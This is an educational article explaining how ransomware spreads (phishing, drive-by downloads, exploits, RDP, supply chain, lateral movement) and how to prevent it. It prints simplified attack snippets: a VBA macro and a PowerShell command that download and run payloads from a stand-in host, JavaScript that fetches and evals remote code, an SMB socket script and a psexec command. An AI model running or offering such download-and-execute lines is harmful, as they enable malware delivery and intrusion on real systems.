Technical guides

How ransomware spreads

Learn how ransomware spreads, the most common attack vectors used by cybercriminals, and how to protect systems, networks, and business data.

a ransomware

11 May 2026

Table of contents

  • How ransomware spreads
  • Phishing and malicious emails
  • Downloads from compromised websites
  • Software vulnerabilities and exploits
  • Attacks through Remote Desktop Protocol (RDP)
  • Supply chain compromise
  • Lateral movement inside corporate networks
  • The Ransomware-as-a-Service model
  • Strategies to prevent ransomware spread

In recent years, ransomware has become one of the most dangerous cyber threats for businesses, institutions, and private users. This type of malware is designed to block access to a victim’s data or computer systems, demanding the payment of a ransom to restore access to files.

While ransomware attacks used to be relatively simple and often limited to spam email campaigns, the methods of distribution have become much more sophisticated. Cybercriminals now use a combination of techniques such as phishing, software vulnerabilities, supply chain attacks, and credential compromise to infiltrate computer systems.

Understanding how ransomware spreads is therefore essential for developing effective defense strategies. In this article we will analyze the main ransomware propagation methods in depth, with concrete examples and practical recommendations to improve cyber security.

How ransomware spreads

The spread of ransomware almost always follows a precise pattern. Attackers must first obtain an entry point inside a system or corporate network. Once access is gained, the malware is installed and the data encryption phase is triggered.

The process can generally be divided into several main stages:

  • Initial access
  • Privilege escalation
  • Lateral movement within the network
  • Malware deployment
  • Data encryption and ransom demand

This structure often reflects the techniques documented in threat analysis frameworks such as MITRE ATT&CK.

Example
A ransomware attack may begin with a simple phishing email that convinces an employee to open an attachment. Hidden inside the file is malicious code that installs a loader, which in turn downloads the actual ransomware.

Phishing and malicious emails

One of the most common ways ransomware spreads is through phishing campaigns.

Attackers send emails that appear to come from trusted sources such as banks, suppliers, or coworkers. These messages often contain attachments or links that trigger the download of malware.

A typical example might be an email with the subject line:

“Urgent invoice – payment pending”

The attachment could be a Word or Excel document containing malicious macros. When the user enables the macros, a script is executed that downloads the ransomware from a remote server.

Below is a simplified example of a malicious macro commonly used in many attacks:

Sub AutoOpen()

    Dim url As String

    url = "http://malicious-server.com/payload.exe"

    Dim filePath As String

    filePath = Environ("TEMP") & "\payload.exe"

    DownloadFile url, filePath

    Shell filePath

End Sub

This type of code shows how a simple document can become a vehicle for malware distribution.

Phishing campaigns remain extremely effective because they exploit the weakest link in cyber security: the human factor.

Downloads from compromised websites

Another widely used method for spreading ransomware involves compromised websites.

In this scenario attackers inject malicious code into legitimate web pages. When a user visits the site, the code attempts to exploit vulnerabilities in the browser or installed plugins.

This type of attack is known as a drive-by download.

The process works as follows:

  • the user visits a compromised website
  • the browser executes malicious JavaScript code
  • a system vulnerability is exploited
  • the ransomware is downloaded and installed

A simplified example of JavaScript used in exploit kits might look like this:

fetch("http://malicious-server.com/exploit")

.then(response => response.text())

.then(data => {

    eval(data);

});

In real attacks the exploits are far more complex, but this example shows how remote code can be executed directly in the browser.

Software vulnerabilities and exploits

Many ransomware attacks exploit vulnerabilities in operating systems or enterprise software.

When software contains an unpatched security flaw, attackers can use it to gain remote access to the system.

One famous example was the WannaCry attack, which exploited a vulnerability in the Windows SMB protocol.

Exploits allow cybercriminals to execute code on the victim’s system without requiring any user interaction.

For instance, an attack could use a script similar to this:

import socket

target = "192.168.1.10"

port = 445

payload = b"malicious_payload"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((target, port))

s.send(payload)

In a real scenario the payload would be much more sophisticated and designed to exploit specific operating system vulnerabilities.

Read the in-depth article: Ransomware: attacks, risks and countermeasures

spreading ransomware

Attacks through Remote Desktop Protocol (RDP)

Another common method of spreading ransomware is unauthorized access to servers via Remote Desktop Protocol (RDP).

Many companies expose RDP services directly to the internet so employees can access systems remotely. If passwords are weak or two-factor authentication is not enabled, attackers can attempt brute-force attacks to gain access.

Once inside the system, cybercriminals can manually deploy the ransomware.

This method is particularly dangerous because attackers can:

  • explore the corporate network
  • disable security systems
  • delete backups
  • distribute ransomware across multiple machines

Many ransomware groups use legitimate administrative tools such as PowerShell to move through the network.

An example command used to distribute malware could be:

Invoke-WebRequest -Uri “http://malicious-server.com/ransomware.exe” -OutFile “C:\temp\ransomware.exe”

Start-Process “C:\temp\ransomware.exe”

Supply chain compromise

In recent years a new type of attack has become increasingly common: software supply chain compromise.

In this scenario attackers insert malicious code into legitimate software used by thousands of companies.

When the software is updated, the malware is automatically distributed to all users.

One of the most well-known cases was the attack on the SolarWinds platform.

This type of attack is extremely dangerous because it exploits the trust users place in software vendors.

According to reports from the National Institute of Standards and Technology, supply chain security has become one of the top priorities in global cyber security.

Lateral movement inside corporate networks

Once ransomware gains access to a system, it does not usually limit itself to a single computer.

Attackers attempt to spread throughout the corporate network in order to maximize damage and increase the likelihood that the ransom will be paid.

This process is known as lateral movement.

Commonly used tools include:

  • PsExec
  • PowerShell
  • stolen credentials
  • network exploits

Example
An attacker might use PsExec to execute ransomware on other computers within the network:

psexec \\192.168.1.20 -u admin -p password ransomware.exe

Within minutes the malware can spread to dozens or even hundreds of systems.

The Ransomware-as-a-Service model

One factor that has accelerated the spread of ransomware is the criminal model known as Ransomware-as-a-Service (RaaS).

In this model ransomware developers create the platform and rent it to other criminals.

Affiliates are responsible for:

  • spreading the malware
  • compromising networks
  • negotiating ransom payments

In return, a percentage of the ransom is paid to the ransomware developers.

This model has made ransomware attacks much more frequent because it has lowered the technical barrier for entering cybercrime.

Strategies to prevent ransomware spread

Preventing the spread of ransomware requires a multilayered strategy that combines technology, training, and security processes.

Some of the most effective measures include:

  • keeping software up to date
  • maintaining offline backups of data
  • enabling multi-factor authentication
  • segmenting the network
  • providing phishing awareness training

Many organizations are also adopting Zero Trust security models, which limit system access and reduce the possibility of lateral movement by attackers.

Prevention remains the most effective defense, because once ransomware has encrypted data, recovery can be extremely difficult.

Conclusion

Understanding how ransomware spreads is essential for building effective defense strategies.

Modern attacks are no longer limited to simple phishing emails but combine multiple techniques such as software exploits, supply chain compromise, and unsecured remote access.

The spread of ransomware is also driven by organized criminal models like Ransomware-as-a-Service, which have transformed cybercrime into a real economic ecosystem.

For this reason organizations must adopt a proactive approach to cyber security, investing in prevention, training, and continuous monitoring.

Only by understanding how threats propagate can companies build more resilient systems and reduce the risk of devastating cyberattacks.

Questions and answers

  1. What is ransomware
    Ransomware is a type of malware that blocks access to data or computer systems and demands a ransom payment to restore access.
  2. What is the most common way ransomware spreads
    The most common method is phishing emails, which trick users into opening malicious attachments or links.
  3. Can ransomware spread automatically across networks
    Yes. Many ransomware variants include lateral movement capabilities that allow them to propagate to other systems.
  4. What is the Ransomware-as-a-Service model
    It is a criminal model where developers rent ransomware platforms to affiliates who distribute the malware.
  5. Do software updates help prevent ransomware
    Yes. Installing security patches reduces the risk of attackers exploiting known vulnerabilities.
  6. Is it possible to recover data without paying the ransom
    It depends on the ransomware variant. In some cases data can be restored through backups or decryption tools.
  7. Does ransomware only affect businesses
    No. Private users can also become victims of ransomware attacks.
  8. Can antivirus software stop ransomware
    Antivirus software helps, but it is not sufficient on its own. A layered security strategy is required.
  9. What is ransomware spread via RDP
    It occurs when attackers gain access to servers through Remote Desktop services using weak passwords or vulnerabilities.
  10. What is the best defense against ransomware
    The combination of secure backups, user training, and updated security systems is the most effective protection strategy.
2
To top